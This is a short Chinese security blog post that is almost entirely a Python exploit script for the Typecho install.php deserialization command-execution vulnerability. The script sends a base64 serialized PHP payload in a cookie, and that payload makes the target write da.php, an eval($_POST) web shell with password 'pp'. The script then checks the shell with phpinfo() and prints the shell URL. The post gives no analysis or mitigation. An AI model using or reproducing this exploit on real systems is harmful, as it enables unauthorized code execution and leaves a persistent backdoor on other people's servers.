typecho install反序列化命令执行


具体漏洞分析就算了 网上一大把

漏洞产生在install.php中,base64后的值被反序列化和实例化后发生命令执行。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
import warnings
from termcolor import cprint

class typecho_install_code_exec_BaseVerify:
def __init__(self, url):
self.url = url

def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
"Referer":self.url + "/install.php",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
}
vulnurl = self.url + "/install.php?finish=1"
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
shellpath = self.url + "/da.php"
post_data ={
"pp":"phpinfo();"
}
req1 = requests.post(self.url + "/da.php", data=post_data, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req1.text:
cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red")
else:
cprint("[-]不存在typecho_install_code_exec漏洞", "white", "on_grey")

except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1])
testVuln.run()
------ 本文结束 ------

本文标题:typecho install反序列化命令执行

文章作者:ApiCoder

发布时间:2019年08月23日 - 17:08

最后更新:2019年08月23日 - 17:08

原始链接:http://www.safeinfo.me/2019/08/23/typecho-install反序列化命令执行.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%